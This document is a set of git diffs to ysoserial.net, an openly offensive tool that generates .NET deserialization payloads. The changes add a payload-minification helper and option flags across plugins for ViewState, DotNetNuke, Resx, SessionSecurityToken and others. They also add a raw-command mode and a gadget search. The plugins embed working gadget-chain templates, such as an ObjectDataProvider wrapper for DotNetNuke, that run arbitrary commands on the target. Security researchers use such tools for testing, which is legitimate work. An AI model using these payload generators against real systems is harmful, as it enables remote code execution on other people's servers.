+ xmlns:xsl=""http://www.w3.org/1999/XSL/Transform"">
+ <xsl:output omit-xml-declaration=""yes"" indent=""no""/>
+
+<xsl:variable name=""whitespace"" select=""'&#09;&#10;&#13; '"" />
+
+<!-- Strips trailing whitespace characters from 'string' -->
+<xsl:template name=""string-rtrim"">
+    <xsl:param name=""string"" />
+    <xsl:param name=""trim"" select=""$whitespace"" />
+
+    <xsl:variable name=""length"" select=""string-length($string)"" />
+
+    <xsl:if test=""$length &gt; 0"">
+        <xsl:choose>
+            <xsl:when test=""contains($trim, substring($string, $length, 1))"">
+                <xsl:call-template name=""string-rtrim"">
+                    <xsl:with-param name=""string"" select=""substring($string, 1, $length - 1)"" />
+                    <xsl:with-param name=""trim""   select=""$trim"" />
+                </xsl:call-template>
+            </xsl:when>
+            <xsl:otherwise>
+                <xsl:value-of select=""$string"" />
+            </xsl:otherwise>
+        </xsl:choose>
+    </xsl:if>
+</xsl:template>
+
+<!-- Strips leading whitespace characters from 'string' -->
+<xsl:template name=""string-ltrim"">
+    <xsl:param name=""string"" />
+    <xsl:param name=""trim"" select=""$whitespace"" />
+
+    <xsl:if test=""string-length($string) &gt; 0"">
+        <xsl:choose>
+            <xsl:when test=""contains($trim, substring($string, 1, 1))"">
+                <xsl:call-template name=""string-ltrim"">
+                    <xsl:with-param name=""string"" select=""substring($string, 2)"" />
+                    <xsl:with-param name=""trim""   select=""$trim"" />
+                </xsl:call-template>
+            </xsl:when>
+            <xsl:otherwise>
+                <xsl:value-of select=""$string"" />
+            </xsl:otherwise>
+        </xsl:choose>
+    </xsl:if>
+</xsl:template>
+
+<!-- Strips leading and trailing whitespace characters from 'string' -->
+<xsl:template name=""string-trim"">
+    <xsl:param name=""string"" />
+    <xsl:param name=""trim"" select=""$whitespace"" />
+    <xsl:call-template name=""string-rtrim"">
+        <xsl:with-param name=""string"">
+            <xsl:call-template name=""string-ltrim"">
+                <xsl:with-param name=""string"" select=""$string"" />
+                <xsl:with-param name=""trim""   select=""$trim"" />
+            </xsl:call-template>
+        </xsl:with-param>
+        <xsl:with-param name=""trim"" select=""$trim"" />
+    </xsl:call-template>
+</xsl:template>
+
+<xsl:template match=""text()"">
+  <xsl:call-template name=""string-trim"">
+        <xsl:with-param name=""string"" select=""."" />
+</xsl:call-template>
+</xsl:template>
+
+ <xsl:template match=""node()|@*"" priority=""-2"">
+     <xsl:copy>
+       <xsl:apply-templates select=""node()|@*""/>
+     </xsl:copy>
+ </xsl:template>
+
+<xsl:template match=""comment()""/>
+
+ <xsl:template match=""*"">
+  <xsl:element name=""{name()}"" namespace=""{namespace-uri()}"">
+   <xsl:variable name=""vtheElem"" select="".""/>
+
+   <xsl:for-each select=""namespace::*"">
+     <xsl:variable name=""vPrefix"" select=""name()""/>
+
+     <xsl:if test=
+      ""$vtheElem/descendant::* [namespace-uri() = current()     and
+                   substring-before(name(),':') = $vPrefix or
+                   @*[substring-before(name(),':') = $vPrefix] or
+                   @*[contains(.,concat($vPrefix,':'))]
+                  ]
+      "">
+      <xsl:copy-of select="".""/>
+     </xsl:if>
+   </xsl:for-each>
+   <xsl:apply-templates select=""node()|@*""/>
+  </xsl:element>
+ </xsl:template>
+</xsl:stylesheet>";
+
+            XslCompiledTransform transform = new XslCompiledTransform();
+
+            transform.Load(new XmlTextReader(new StringReader(xsltDoc)));
+
+            XmlWriterSettings settings = new XmlWriterSettings();
+
+            settings.Indent = false;
+            settings.NewLineHandling = NewLineHandling.None;
+            settings.NewLineOnAttributes = false;
+            settings.ConformanceLevel = ConformanceLevel.Document;
+            settings.OmitXmlDeclaration = true;
+            settings.NamespaceHandling = NamespaceHandling.OmitDuplicates;
+
+
+
+            using (MemoryStream memoryStream = new MemoryStream())
+            {
+                using (StreamReader reader = new StreamReader(memoryStream))
+                {
+                    using (XmlWriter writer = XmlWriter.Create(memoryStream, settings))
+                    {
+                        XmlReader xmlReadB = new XmlTextReader(new StringReader(minifiedXMLDoc.OuterXml));
+
+                        transform.Transform(xmlReadB, null, writer);
+
+                        memoryStream.Position = 0;
+
+                        xmlDocument = reader.ReadToEnd();
+                    }
+                }
+            }
+
+
+            return xmlDocument;
+        }
+
+
+        private static String SoapRefIdMinifier(String xmlDocument)
+        {
+
+            string refIdPattern = @"id=""(ref\-\d+)""";
+            Regex refIdRegEx = new Regex(refIdPattern, RegexOptions.Compiled);
+            MatchCollection refIdMatches = refIdRegEx.Matches(xmlDocument);
+
+
+            // populating an array of A-Z
+            String[] alpha = new String[26];
+            int counter = 0;
+            for (char c = 'A'; c <= 'Z'; c++)
+            {
+                alpha[counter] = c.ToString();
+                counter++;
+            }
+            counter = 0;
+
+            foreach (Match match in refIdMatches)
+            {
+                GroupCollection groups = match.Groups;
+                String refIdName = groups[1].Value;
+
+                if (xmlDocument.Contains(@"href=""#" + refIdName + @""""))
+                {
+                    // refId is in use - it needs to be shortened
+                    string newRefID = "";
+                    if (Math.Abs(counter / 26) == 0)
+                    {
+                        newRefID = alpha[counter % 26].ToLowerInvariant();
+                    }
+                    else if (Math.Abs(counter / 26) == 1)
+                    {
+                        newRefID = alpha[counter % 26];
+                    }
+                    else
+                    {
+                        newRefID = alpha[counter % 26].ToLowerInvariant() + (counter - 52);
+                    }
+                    counter++;
+                    // change
+                    xmlDocument = xmlDocument.Replace(@"id=""" + refIdName + @"""", @"id=""" + newRefID + @"""");
+                    xmlDocument = xmlDocument.Replace(@"href=""#" + refIdName + @"""", @"href=""#" + newRefID + @"""");
+                }
+                else
+                {
+                    // remove
+                    xmlDocument = xmlDocument.Replace(@"id=""" + refIdName + @"""", "");
+                }
+                
+            }
+
+            return xmlDocument;
+        }
+
+        private static String NetDataContractorIdMinifier(String xmlDocument)
+        {
+
+            string refIdPattern = @"\:Id=""(\d+)""";
+            Regex refIdRegEx = new Regex(refIdPattern, RegexOptions.Compiled);
+            MatchCollection refIdMatches = refIdRegEx.Matches(xmlDocument);
+
+
+
+            int counter = 0;
+
+            foreach (Match match in refIdMatches)
+            {
+                GroupCollection groups = match.Groups;
+                String refIdName = groups[1].Value;
+
+                if (xmlDocument.Contains(@":Ref=""" + refIdName + @""""))
+                {
+                    counter++;
+                    // change
+                    xmlDocument = xmlDocument.Replace(@":Id=""" + refIdName + @"""", @":Id=""NetDataContractorIdMinifier_" + counter + @"""");
+                    xmlDocument = xmlDocument.Replace(@":Ref=""" + refIdName + @"""", @":Ref=""NetDataContractorIdMinifier_" + counter + @"""");
+                }
+                else
+                {
+                    // remove
+                    xmlDocument = Regex.Replace(xmlDocument, @"[^\s]+:Id=""" + refIdName + @"""", "");
+                }
+
+            }
+
+            xmlDocument = xmlDocument.Replace("NetDataContractorIdMinifier_","");
+
+            return xmlDocument;
+        }
+
+        private static String DataContractorIdMinifier(String xmlDocument)
+        {
+
+            string refIdPattern = @"\:Id=""ref(\d+)""";
+            Regex refIdRegEx = new Regex(refIdPattern, RegexOptions.Compiled);
+            MatchCollection refIdMatches = refIdRegEx.Matches(xmlDocument);
+
+
+
+            int counter = 0;
+
+            foreach (Match match in refIdMatches)
+            {
+                GroupCollection groups = match.Groups;
+                String refIdName = groups[1].Value;
+
+                if (xmlDocument.Contains(@":Ref=""ref" + refIdName + @""""))
+                {
+                    counter++;
+                    // change
+                    xmlDocument = xmlDocument.Replace(@":Id=""ref" + refIdName + @"""", @":Id=""NetDataContractorIdMinifier_" + counter + @"""");
+                    xmlDocument = xmlDocument.Replace(@":Ref=""ref" + refIdName + @"""", @":Ref=""NetDataContractorIdMinifier_" + counter + @"""");
+                }
+                else
+                {
+                    // remove
+                    xmlDocument = Regex.Replace(xmlDocument, @"[^\s]+:Id=""ref" + refIdName + @"""", "");
+                }
+
+            }
+
+            xmlDocument = xmlDocument.Replace("NetDataContractorIdMinifier_", "");
+
+            return xmlDocument;
+        }
+    }
+}

--- a/ysoserial/Helpers/YamlDotNet.cs
+++ b/ysoserial/Helpers/YamlDotNet.cs
@@ -1,10 +1,7 @@
 ﻿using System;
-using System.Collections.Generic;
-using System.Linq;
-using System.Text;
 using System.Text.RegularExpressions;
-using System.Threading.Tasks;
 
+// Coded by Soroush Dalili (@irsdl)
 namespace ysoserial.Helpers
 {
     class YamlDotNet

--- a/ysoserial/Helpers/YamlDotNet.cs
+++ b/ysoserial/Helpers/YamlDotNet.cs
@@ -1,7 +1,6 @@
 ﻿using System;
 using System.Text.RegularExpressions;
 
-// Coded by Soroush Dalili (@irsdl)
 namespace ysoserial.Helpers
 {
     class YamlDotNet

--- a/ysoserial/Helpers/YamlDotNet.cs
+++ b/ysoserial/Helpers/YamlDotNet.cs
@@ -1,0 +1,22 @@
+﻿using System;
+using System.Collections.Generic;
+using System.Linq;
+using System.Text;
+using System.Text.RegularExpressions;
+using System.Threading.Tasks;
+
+namespace ysoserial.Helpers
+{
+    class YamlDotNet
+    {
+        public static String Minify(String xmlDocument)
+        {
+            xmlDocument = Regex.Replace(xmlDocument, "[\r\n]", "");
+            xmlDocument = Regex.Replace(xmlDocument, @"\s+", " ");
+            xmlDocument = Regex.Replace(xmlDocument, @"\s+\}", "}");
+            xmlDocument = Regex.Replace(xmlDocument, @"\{\s+", "{");
+            xmlDocument = Regex.Replace(xmlDocument, @",\s+", ",");
+            return xmlDocument;
+        }
+    }
+}

--- a/ysoserial/Plugins/AltserializationPlugin.cs
+++ b/ysoserial/Plugins/AltserializationPlugin.cs
@@ -24,6 +24,7 @@ namespace ysoserial.Plugins
         static string mode = "";
         static string command = "";
         static Boolean test = false;
+        static Boolean minify = false;
 
         static OptionSet options = new OptionSet()
             {
@@ -31,6 +32,7 @@ namespace ysoserial.Plugins
                 {"o|output=", "the output format (raw|base64).", v => format = v },
                 {"c|command=", "the command to be executed", v => command = v },
                 {"t|test", "whether to run payload locally. Default: false", v => test =  v != null },
+                {"minify", "Whether to minify the payloads where applicable (experimental). Default: false", v => minify =  v != null },
             };
 
         public string Name()
@@ -120,7 +122,7 @@ namespace ysoserial.Plugins
             else
             {
                 // HttpStaticObjectsCollection
-                byte[] serializedData = (byte[])new TypeConfuseDelegateGenerator().Generate(command, "BinaryFormatter", false);
+                byte[] serializedData = (byte[])new TypeConfuseDelegateGenerator().Generate(command, "BinaryFormatter", false, minify);
                 byte[] newSerializedData = new byte[serializedData.Length + 7]; // ReadInt32 + ReadString + ReadBoolean + ReadByte
                 serializedData.CopyTo(newSerializedData, 7);
                 newSerializedData[0] = 1; // for ReadInt32

--- a/ysoserial/Plugins/AltserializationPlugin.cs
+++ b/ysoserial/Plugins/AltserializationPlugin.cs
@@ -32,7 +32,7 @@ namespace ysoserial.Plugins
                 {"o|output=", "the output format (raw|base64).", v => format = v },
                 {"c|command=", "the command to be executed", v => command = v },
                 {"t|test", "whether to run payload locally. Default: false", v => test =  v != null },
-                {"minify", "Whether to minify the payloads where applicable (experimental). Default: false", v => minify =  v != null },
+                //{"minify", "Whether to minify the payloads where applicable (experimental). Default: false", v => minify =  v != null },
             };
 
         public string Name()

--- a/ysoserial/Plugins/ApplicationTrustPlugin.cs
+++ b/ysoserial/Plugins/ApplicationTrustPlugin.cs
@@ -20,11 +20,13 @@ namespace ysoserial.Plugins
     {
         static string command = "";
         static Boolean test = false;
+        static Boolean minify = false;
 
         static OptionSet options = new OptionSet()
             {
                 {"c|command=", "the command to be executed", v => command = v },
                 {"t|test", "whether to run payload locally. Default: false", v => test =  v != null },
+                {"minify", "Whether to minify the payloads where applicable (experimental). Default: false", v => minify =  v != null },
             };
 
         public string Name()
@@ -83,7 +85,7 @@ namespace ysoserial.Plugins
                 System.Environment.Exit(-1);
             }
 
-            byte[] osf = (byte[])new TypeConfuseDelegateGenerator().Generate(command, "BinaryFormatter", false);
+            byte[] osf = (byte[])new TypeConfuseDelegateGenerator().Generate(command, "BinaryFormatter", false, minify);
             payloadValue = BitConverter.ToString(osf).Replace("-", string.Empty);
             payload = String.Format(payload, payloadValue);
 

--- a/ysoserial/Plugins/ApplicationTrustPlugin.cs
+++ b/ysoserial/Plugins/ApplicationTrustPlugin.cs
@@ -89,6 +89,11 @@ namespace ysoserial.Plugins
             payloadValue = BitConverter.ToString(osf).Replace("-", string.Empty);
             payload = String.Format(payload, payloadValue);
 
+            if (minify)
+            {
+                payload = Helpers.XMLMinifier.Minify(payload, null, null);
+            }
+
             if (test)
             {
                 // PoC on how it works in practice

--- a/ysoserial/Plugins/ClipboardPlugin.cs
+++ b/ysoserial/Plugins/ClipboardPlugin.cs
@@ -34,7 +34,7 @@ namespace ysoserial.Plugins
                 {"F|format=", "the object format: Csv, DeviceIndependentBitmap, DataInterchangeFormat, PenData, RiffAudio, WindowsForms10PersistentObject, System.String, SymbolicLink, TaggedImageFileFormat, WaveAudio. Default: System.String", v => format = v },
                 {"c|command=", "the command to be executed", v => command = v },
                 {"t|test", "whether to run payload locally. Default: false", v => test =  v != null },
-                {"minify", "Whether to minify the payloads where applicable (experimental). Default: false", v => minify =  v != null },
+                //{"minify", "Whether to minify the payloads where applicable (experimental). Default: false", v => minify =  v != null },
             };
 
         public string Name()

--- a/ysoserial/Plugins/ClipboardPlugin.cs
+++ b/ysoserial/Plugins/ClipboardPlugin.cs
@@ -27,12 +27,14 @@ namespace ysoserial.Plugins
         static string format = System.Windows.Forms.DataFormats.StringFormat;
         static string command = "";
         static Boolean test = false;
+        static Boolean minify = false;
 
         static OptionSet options = new OptionSet()
             {
                 {"F|format=", "the object format: Csv, DeviceIndependentBitmap, DataInterchangeFormat, PenData, RiffAudio, WindowsForms10PersistentObject, System.String, SymbolicLink, TaggedImageFileFormat, WaveAudio. Default: System.String", v => format = v },
                 {"c|command=", "the command to be executed", v => command = v },
                 {"t|test", "whether to run payload locally. Default: false", v => test =  v != null },
+                {"minify", "Whether to minify the payloads where applicable (experimental). Default: false", v => minify =  v != null },
             };
 
         public string Name()
@@ -85,7 +87,7 @@ namespace ysoserial.Plugins
                     System.Environment.Exit(-1);
                 }
 
-                byte[] serializedData = (byte[])new TypeConfuseDelegateGenerator().Generate(command, "BinaryFormatter", false);
+                byte[] serializedData = (byte[])new TypeConfuseDelegateGenerator().Generate(command, "BinaryFormatter", false, minify);
                 MemoryStream ms = new MemoryStream(serializedData);
                 DataSetMarshal payloadDataSetMarshal = new DataSetMarshal(ms);
 

--- a/ysoserial/Plugins/DotNetNukePlugin.cs
+++ b/ysoserial/Plugins/DotNetNukePlugin.cs
@@ -82,6 +82,12 @@ namespace ysoserial.Plugins
                 Console.WriteLine("Try 'ysoserial -p " + Name() + " --help' for more information.");
                 System.Environment.Exit(-1);
             }
+
+            if (minify)
+            {
+                payload = Helpers.XMLMinifier.Minify(payload, null, null);
+            }
+
             return payload;
 
         }

--- a/ysoserial/Plugins/DotNetNukePlugin.cs
+++ b/ysoserial/Plugins/DotNetNukePlugin.cs
@@ -12,6 +12,7 @@ namespace ysoserial.Plugins
         static string file = "";
         static string url = "";
         static string command = "";
+        static Boolean minify = false;
 
         static OptionSet options = new OptionSet()
             {
@@ -19,6 +20,7 @@ namespace ysoserial.Plugins
                 {"c|command=", "the command to be executed in run_command mode.", v => command = v },
                 {"u|url=", "the url to fetch the file from in write_file mode.", v => url = v },
                 {"f|file=", "the file to read in read_file mode or the file to write to in write_file_mode.", v => path = v },
+                {"minify", "Whether to minify the payloads where applicable (experimental). Default: false", v => minify =  v != null },
             };
 
         public string Name()
@@ -67,7 +69,7 @@ namespace ysoserial.Plugins
             }
             else if (mode == "run_command" && command != "")
             {
-                byte[] osf = (byte[]) new TypeConfuseDelegateGenerator().Generate(command, "ObjectStateFormatter", false);
+                byte[] osf = (byte[]) new TypeConfuseDelegateGenerator().Generate(command, "ObjectStateFormatter", false, minify);
                 string b64encoded = Convert.ToBase64String(osf);
                 string prefix = @"<profile><item key=""key"" type=""System.Data.Services.Internal.ExpandedWrapper`2[[System.Web.UI.ObjectStateFormatter, System.Web, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a],[System.Windows.Data.ObjectDataProvider, PresentationFramework, Version=4.0.0.0, Culture=neutral, PublicKeyToken=31bf3856ad364e35]], System.Data.Services, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089""><ExpandedWrapperOfObjectStateFormatterObjectDataProvider><ProjectedProperty0><ObjectInstance p3:type=""ObjectStateFormatter"" xmlns:p3=""http://www.w3.org/2001/XMLSchema-instance"" /><MethodName>Deserialize</MethodName><MethodParameters><anyType xmlns:q1=""http://www.w3.org/2001/XMLSchema"" p5:type=""q1:string"" xmlns:p5=""http://www.w3.org/2001/XMLSchema-instance"">";
                 string suffix = @"</anyType></MethodParameters></ProjectedProperty0></ExpandedWrapperOfObjectStateFormatterObjectDataProvider></item></profile>";

--- a/ysoserial/Plugins/ResxPlugin.cs
+++ b/ysoserial/Plugins/ResxPlugin.cs
@@ -177,6 +177,12 @@ namespace ysoserial.Plugins
             }
 
             payload = String.Format(payload, mtype, payloadValue);
+
+            if (minify)
+            {
+                payload = Helpers.XMLMinifier.Minify(payload, null, null);
+            }
+
             return payload;
         }
     }

--- a/ysoserial/Plugins/ResxPlugin.cs
+++ b/ysoserial/Plugins/ResxPlugin.cs
@@ -23,12 +23,14 @@ namespace ysoserial.Plugins
         static string mode = "";
         static string file = "";
         static string command = "";
+        static Boolean minify = false;
 
         static OptionSet options = new OptionSet()
             {
                 {"M|mode=", "the payload mode: indirect_resx_file, BinaryFormatter, SoapFormatter.", v => mode = v },
                 {"c|command=", "the command to be executed in BinaryFormatter. If this is provided for SoapFormatter, it will be used as a file for ActivitySurrogateSelectorFromFile", v => command = v },
                 {"F|file=", "UNC file path location: this is used in indirect_resx_file mode.", v => file = v },
+                {"minify", "Whether to minify the payloads where applicable (experimental). Default: false", v => minify =  v != null }
             };
 
         public string Name()
@@ -146,7 +148,7 @@ namespace ysoserial.Plugins
                     if (!String.IsNullOrEmpty(command) && !String.IsNullOrWhiteSpace(command))
                     {
                         mtype = @"mimetype=""application/x-microsoft.net.object.binary.base64""";
-                        byte[] osf = (byte[])new TypeConfuseDelegateGenerator().Generate(command, "BinaryFormatter", false);
+                        byte[] osf = (byte[])new TypeConfuseDelegateGenerator().Generate(command, "BinaryFormatter", false, minify);
                         payloadValue = Convert.ToBase64String(osf);
 
                     }
@@ -155,12 +157,12 @@ namespace ysoserial.Plugins
                     mtype = @"mimetype=""application/x-microsoft.net.object.soap.base64""";
                     if (!String.IsNullOrEmpty(command) && !String.IsNullOrWhiteSpace(command))
                     {
-                        byte[] osf = (byte[])new ActivitySurrogateSelectorFromFileGenerator().Generate(command, "SoapFormatter", false);
+                        byte[] osf = (byte[])new ActivitySurrogateSelectorFromFileGenerator().Generate(command, "SoapFormatter", false, minify);
                         payloadValue = Convert.ToBase64String(osf);
                     }
                     else
                     {
-                        byte[] osf = (byte[])new ActivitySurrogateSelectorGenerator().Generate("", "SoapFormatter", false);
+                        byte[] osf = (byte[])new ActivitySurrogateSelectorGenerator().Generate("", "SoapFormatter", false, minify);
                         payloadValue = Convert.ToBase64String(osf);
                     }
                     break;

--- a/ysoserial/Plugins/SessionSecurityTokenHandlerPlugin.cs
+++ b/ysoserial/Plugins/SessionSecurityTokenHandlerPlugin.cs
@@ -29,7 +29,7 @@ namespace ysoserial.Plugins
 
         static OptionSet options = new OptionSet()
             {
-                {"c|command=", "the command to be executed", v => command = v },
+                {"c|command=", "the command to be executed e.g. \"cmd /c calc\"", v => command = v },
                 {"t|test", "whether to run payload locally. Default: false", v => test =  v != null },
                 {"minify", "Whether to minify the payloads where applicable (experimental). Default: false", v => minify =  v != null }
             };
@@ -69,12 +69,17 @@ namespace ysoserial.Plugins
                 System.Environment.Exit(-1);
             }
             String payloadValue = "";
-            string payload = @"<SecurityContextToken xmlns='http://schemas.xmlsoap.org/ws/2005/02/sc' Id='uuid-709ab608-2004-44d5-b392-f3c5bf7c67fb-1'>
+            string payload = @"<SecurityContextToken xmlns='http://schemas.xmlsoap.org/ws/2005/02/sc'>
 	<Identifier xmlns='http://schemas.xmlsoap.org/ws/2005/02/sc'>
-		urn:unique-id:securitycontext:1337
+		urn:unique-id:securitycontext:1
 	</Identifier>
 	<Cookie xmlns='http://schemas.microsoft.com/ws/2006/05/security'>{0}</Cookie>
 </SecurityContextToken>";
+
+            if (minify)
+            {
+                payload = Helpers.XMLMinifier.Minify(payload, null, null);
+            }
 
             if (String.IsNullOrEmpty(command) || String.IsNullOrWhiteSpace(command))
             {
@@ -104,6 +109,11 @@ namespace ysoserial.Plugins
                 {
                     // there will be an error!
                 }
+            }
+
+            if (minify)
+            {
+                payload = Helpers.XMLMinifier.Minify(payload, null, null);
             }
 
             return payload;

--- a/ysoserial/Plugins/SessionSecurityTokenHandlerPlugin.cs
+++ b/ysoserial/Plugins/SessionSecurityTokenHandlerPlugin.cs
@@ -25,11 +25,13 @@ namespace ysoserial.Plugins
     {
         static string command = "";
         static Boolean test = false;
+        static Boolean minify = false;
 
         static OptionSet options = new OptionSet()
             {
                 {"c|command=", "the command to be executed", v => command = v },
                 {"t|test", "whether to run payload locally. Default: false", v => test =  v != null },
+                {"minify", "Whether to minify the payloads where applicable (experimental). Default: false", v => minify =  v != null }
             };
 
         public string Name()
@@ -82,7 +84,7 @@ namespace ysoserial.Plugins
                 System.Environment.Exit(-1);
             }
 
-            byte[] serializedData = (byte[])new TypeConfuseDelegateGenerator().Generate(command, "BinaryFormatter", false);
+            byte[] serializedData = (byte[])new TypeConfuseDelegateGenerator().Generate(command, "BinaryFormatter", false, minify);
             DeflateCookieTransform myDeflateCookieTransform = new DeflateCookieTransform();
             ProtectedDataCookieTransform myProtectedDataCookieTransform = new ProtectedDataCookieTransform();
             byte[] deflateEncoded = myDeflateCookieTransform.Encode(serializedData);

--- a/ysoserial/Plugins/TransactionManagerReenlist.cs
+++ b/ysoserial/Plugins/TransactionManagerReenlist.cs
@@ -28,7 +28,7 @@ namespace ysoserial.Plugins
             {
                 {"c|command=", "the command to be executed", v => command = v },
                 {"t|test", "whether to run payload locally. Default: false", v => test =  v != null },
-                {"minify", "Whether to minify the payloads where applicable (experimental). Default: false", v => minify =  v != null }
+                //{"minify", "Whether to minify the payloads where applicable (experimental). Default: false", v => minify =  v != null }
             };
 
         public string Name()

--- a/ysoserial/Plugins/TransactionManagerReenlist.cs
+++ b/ysoserial/Plugins/TransactionManagerReenlist.cs
@@ -22,11 +22,13 @@ namespace ysoserial.Plugins
     {
         static string command = "";
         static Boolean test = false;
+        static Boolean minify = false;
 
         static OptionSet options = new OptionSet()
             {
                 {"c|command=", "the command to be executed", v => command = v },
                 {"t|test", "whether to run payload locally. Default: false", v => test =  v != null },
+                {"minify", "Whether to minify the payloads where applicable (experimental). Default: false", v => minify =  v != null }
             };
 
         public string Name()
@@ -73,7 +75,7 @@ namespace ysoserial.Plugins
                 System.Environment.Exit(-1);
             }
 
-            byte[] serializedData = (byte[])new TypeConfuseDelegateGenerator().Generate(command, "BinaryFormatter", false);
+            byte[] serializedData = (byte[])new TypeConfuseDelegateGenerator().Generate(command, "BinaryFormatter", false, minify);
             byte[] newSerializedData = new byte[serializedData.Length + 5]; // it has BinaryReader ReadInt32() + 1 additional byte read
             serializedData.CopyTo(newSerializedData, 5);
             newSerializedData[0] = 1;

--- a/ysoserial/Plugins/ViewStatePlugin.cs
+++ b/ysoserial/Plugins/ViewStatePlugin.cs
@@ -27,6 +27,7 @@ namespace ysoserial.Plugins
     {
         static bool showExamples = false;
         static bool dryRun = false;
+        static bool minify = false;
         static bool isDebug = false;
         static string gadget = "ActivitySurrogateSelector";
         static string cmd = "";
@@ -67,6 +68,7 @@ namespace ysoserial.Plugins
                 {"decryptionkey=", "this is the decryptionKey attribute from machineKey in the web.config file", v => decryptionKey = v},
                 {"validationalg=", "the validation algorithm can be set to SHA1, HMACSHA256, HMACSHA384, HMACSHA512, MD5, 3DES, AES. Default: HMACSHA256", v => validationAlg = v},
                 {"validationkey=", "this is the validationKey attribute from machineKey in the web.config file", v => validationKey = v},
+                {"minify", "Whether to minify the payloads where applicable (experimental). Default: false", v => minify =  v != null },
                 {"isdebug", "to show useful debugging messages!", v => isDebug = v != null },
             };
 
@@ -180,7 +182,7 @@ namespace ysoserial.Plugins
                 // Check Generator supports specified formatter
                 if (generator.IsSupported(formatter))
                 {
-                    payloadString = System.Text.Encoding.ASCII.GetString((byte[])generator.Generate(cmd, formatter, false));
+                    payloadString = System.Text.Encoding.ASCII.GetString((byte[])generator.Generate(cmd, formatter, false, minify));
                 }
                 else
                 {

--- a/ysoserial/Plugins/ViewStatePlugin.cs
+++ b/ysoserial/Plugins/ViewStatePlugin.cs
@@ -68,7 +68,7 @@ namespace ysoserial.Plugins
                 {"decryptionkey=", "this is the decryptionKey attribute from machineKey in the web.config file", v => decryptionKey = v},
                 {"validationalg=", "the validation algorithm can be set to SHA1, HMACSHA256, HMACSHA384, HMACSHA512, MD5, 3DES, AES. Default: HMACSHA256", v => validationAlg = v},
                 {"validationkey=", "this is the validationKey attribute from machineKey in the web.config file", v => validationKey = v},
-                {"minify", "Whether to minify the payloads where applicable (experimental). Default: false", v => minify =  v != null },
+                //{"minify", "Whether to minify the payloads where applicable (experimental). Default: false", v => minify =  v != null },
                 {"isdebug", "to show useful debugging messages!", v => isDebug = v != null },
             };
 

--- a/ysoserial/Program.cs
+++ b/ysoserial/Program.cs
@@ -16,6 +16,7 @@ namespace ysoserial
         static string format = "raw";
         static string gadget = "";
         static string formatter = "";
+        static string searchformatter = "";
         static string cmd = "";
         static Boolean rawcmd = false;
         static Boolean cmdstdin = false;
@@ -39,8 +40,9 @@ namespace ysoserial
                 {"s|stdin", "The command to be executed will be read from standard input.", v => cmdstdin = v != null },
                 {"t|test", "Whether to run payload locally. Default: false", v => test =  v != null },
                 {"minify", "Whether to minify the payloads where applicable (experimental). Default: false", v => minify =  v != null },
+                {"sf|searchformatter=", "Search in all formatters to show relevant gadgets and their formatters (other parameters will be ignored).", v => searchformatter =  v},
                 {"h|help", "Shows this message and exit.", v => show_help = v != null },
-                {"credit", "Shows the credit/history of gadgets and plugins.", v => show_credit =  v != null },
+                {"credit", "Shows the credit/history of gadgets and plugins (other parameters will be ignored).", v => show_credit =  v != null },
             };
 
         static void Main(string[] args)
@@ -59,7 +61,7 @@ namespace ysoserial
 
             if (
                 ((cmd == "" && !cmdstdin) || formatter == "" || gadget == "" || format == "") &&
-                plugin_name == "" && !show_credit
+                plugin_name == "" && !show_credit && searchformatter == ""
             )
             {
                 Console.WriteLine("Missing arguments.");
@@ -80,6 +82,12 @@ namespace ysoserial
             // Populate list of available plugins
             var pluginTypes = types.Where(p => typeof(Plugin).IsAssignableFrom(p) && !p.IsInterface);
             plugins = pluginTypes.Select(x => x.Name.Replace("Plugin", "")).ToList();
+
+            // Search in formatters
+            if (searchformatter != "")
+            {
+                SearchFormatters(searchformatter);
+            }
 
             // Show credits if requested
             if (show_credit)
@@ -205,6 +213,41 @@ namespace ysoserial
             }
         }
 
+        private static void SearchFormatters(string searchformatter)
+        {
+            Console.WriteLine("Formatter search result for \"" + searchformatter + "\":\n");
+            foreach (string g in generators)
+            {
+                try
+                {
+                    if (g != "Generic")
+                    {
+                        ObjectHandle container = Activator.CreateInstance(null, "ysoserial.Generators." + g + "Generator");
+                        Generator gg = (Generator)container.Unwrap();
+                        Boolean gadgetSelected = false;
+                        foreach(string formatter in gg.SupportedFormatters())
+                        {
+                            if (formatter.ToLower().Contains(searchformatter.ToLower()))
+                            {
+                                if(gadgetSelected == false)
+                                {
+                                    Console.WriteLine("\t" + gg.Name() + " (" + gg.Description() + ")");
+                                    Console.WriteLine("\t\tFound formatters:");
+                                    gadgetSelected = true;
+                                }
+                                Console.WriteLine("\t\t\t" + formatter);
+                            }
+                        }
+                    }
+                }
+                catch
+                {
+                    
+                }
+
+            }
+            System.Environment.Exit(-1);
+        }
 
         private static void ShowHelp()
         {

--- a/ysoserial/Program.cs
+++ b/ysoserial/Program.cs
@@ -17,9 +17,11 @@ namespace ysoserial
         static string gadget = "";
         static string formatter = "";
         static string cmd = "";
+        static Boolean rawcmd = false;
         static Boolean cmdstdin = false;
         static string plugin_name = "";
         static Boolean test = false;
+        static Boolean minify = false;
         static Boolean show_help = false;
         static Boolean show_credit = false;
 
@@ -33,8 +35,10 @@ namespace ysoserial
                 {"g|gadget=", "The gadget chain.", v => gadget = v },
                 {"f|formatter=", "The formatter.", v => formatter = v },
                 {"c|command=", "The command to be executed.", v => cmd = v },
+                {"rawcmd", "Command will be executed as is without `cmd /c ` being appended (anything after first space is an argument).", v => rawcmd =  v != null },
                 {"s|stdin", "The command to be executed will be read from standard input.", v => cmdstdin = v != null },
                 {"t|test", "Whether to run payload locally. Default: false", v => test =  v != null },
+                {"minify", "Whether to minify the payloads where applicable (experimental). Default: false", v => minify =  v != null },
                 {"h|help", "Shows this message and exit.", v => show_help = v != null },
                 {"credit", "Shows the credit/history of gadgets and plugins.", v => show_credit =  v != null },
             };
@@ -60,6 +64,11 @@ namespace ysoserial
             {
                 Console.WriteLine("Missing arguments.");
                 show_help = true;
+            }
+
+            if (!rawcmd)
+            {
+                cmd = "cmd /c " + cmd;
             }
 
             var types = AppDomain.CurrentDomain.GetAssemblies().SelectMany(s => s.GetTypes());
@@ -140,7 +149,7 @@ namespace ysoserial
                     {
                         cmd = Console.ReadLine();
                     }
-                    raw = generator.Generate(cmd, formatter, test);
+                    raw = generator.Generate(cmd, formatter, test, minify);
                 }
                 else
                 {
@@ -203,7 +212,7 @@ namespace ysoserial
             Console.WriteLine("");
             if (plugin_name == "")
             {
-                Console.WriteLine("Available formatters:");
+                Console.WriteLine("Available gadgets:\n");
                 foreach (string g in generators)
                 {
                     try
@@ -214,10 +223,14 @@ namespace ysoserial
